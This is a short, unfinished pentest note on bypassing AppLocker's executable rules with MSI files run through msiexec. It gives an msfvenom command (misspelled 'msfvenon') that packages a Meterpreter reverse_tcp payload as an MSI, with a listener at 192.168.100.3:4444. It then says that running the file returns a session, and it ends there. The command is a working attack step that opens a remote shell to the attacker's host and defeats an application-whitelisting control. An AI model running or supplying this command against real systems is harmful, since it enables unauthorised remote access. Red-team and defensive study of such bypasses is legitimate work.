Application Whitelisting Bypass
TODO
MSIEXEC is a Microsoft utility which can be used to install applications. If MSI files are not blocked by AppLocker then it can allow an attacker to bypass AppLocker executable rules.
Metasploit MSFVenom can be used to generate MSI files that contain a Meterpreter payload:
msfvenon -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.3 LPORT=4444 -f msi > pentestlab.msi
Execution of the MSI file on the target system will return a Meterpreter session:
